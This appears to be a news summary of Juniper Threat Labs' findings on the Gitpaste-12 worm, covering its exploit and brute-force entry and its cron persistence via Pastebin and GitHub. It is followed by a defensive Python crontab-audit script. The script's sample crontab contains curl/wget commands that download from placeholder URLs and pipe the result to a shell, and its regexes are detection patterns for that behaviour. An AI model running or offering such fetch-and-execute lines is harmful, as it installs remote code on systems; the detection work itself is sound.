Juniper Threat Labs: Gitpaste-12 is a new worm which uses GitHub and Pastebin for housing component code and has at least 12 different attack modules available
Gitpaste-12 is new malware that uses GitHub and Pastebin to house its component code and has at least 12 different attack modules available. It was discovered by Juniper Threat Labs cybersecurity experts. There is evidence of test code for possible future modules, indicating ongoing development of the worm. For now, however, its targets are Linux-based x86 servers, as well as Linux ARM- and MIPS-based IoT devices. The first Gitpaste-12 attacks were detected on October 15, 2020. Researchers reported both the Pastebin URL and the git repo in question, and the git repo was closed on October 30, 2020. This should stop the proliferation of this botnet.
The cybersecurity experts: How the malware infection chain works
According to the cybersecurity experts, the first phase of the attack is the initial system compromise. Gitpaste-12 attempts to use known exploits to compromise systems and may also attempt to brute-force passwords. Immediately after compromising a system, the malware sets up a cron job that it downloads from Pastebin, which in turn calls the same script and executes it again each minute. This is presumably one mechanism by which updates to the cron jobs can be pushed to the botnet. The main shell script uploaded to the victim machine during the attack then starts to download and execute the other components of Gitpaste-12. First, it downloads and sets up a cron job, which periodically downloads and executes a script from Pastebin. Next, it downloads from GitHub and executes it.
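A defender's check for the cron persistence described above, added here as an example and not taken from Juniper's research or the original article: it audits user-crontab text for entries that fetch from Pastebin or GitHub and notes whether the entry runs every minute and executes what it fetched. The function names, the host list and the sample crontab (with placeholder URLs) are assumptions constructed for illustration.

```python
import re

# Hosts the article names as housing component code (assumed list; extend as needed).
HOSTING = re.compile(
    r"https?://(?:www\.)?(pastebin\.com|github\.com|raw\.githubusercontent\.com)(?=[/:\s]|$)", re.I)
FETCH = re.compile(r"\b(?:curl|wget)\b")
# Download handed to a shell: "| sh", "&& sh file", or "sh -c ...".
EXEC = re.compile(r"(?:\||&&)\s*(?:ba|da|z)?sh\b|\b(?:ba|da|z)?sh\s+-c\b")

SAMPLE = """\
# constructed crontab for illustration; URLs are placeholders
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
* * * * * curl -fsSL https://pastebin.com/raw/EXAMPLE0 | sh
*/30 * * * * wget -qO /tmp/.x https://raw.githubusercontent.com/example-user/example-repo/master/file && sh /tmp/.x
15 4 * * 1 curl -fsS https://updates.example.org/feed.json -o /var/cache/feed.json
"""

def parse_entry(line):
    """Return (schedule, command) for a crontab entry, or None for comments, blanks, env lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):  # @reboot, @hourly, ...
        parts = line.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = line.split(None, 5)
    if len(parts) < 6 or not re.fullmatch(r"[\d*/,\-]+", parts[0]):
        return None
    return " ".join(parts[:5]), parts[5]

def audit_crontab(text):
    """List entries that download from a code/paste hosting site, with triage flags."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        entry = parse_entry(raw)
        if entry is None:
            continue
        schedule, command = entry
        host = HOSTING.search(command)
        if not (host and FETCH.search(command)):
            continue
        findings.append({
            "line": lineno,
            "host": host.group(1).lower(),
            "every_minute": schedule in ("* * * * *", "*/1 * * * *"),
            "runs_download": bool(EXEC.search(command)),
        })
    return findings
```

Feed it the output of `crontab -l` for each account; for `/etc/crontab` and `/etc/cron.d` files the extra user field ends up at the start of the command, which does not affect the match.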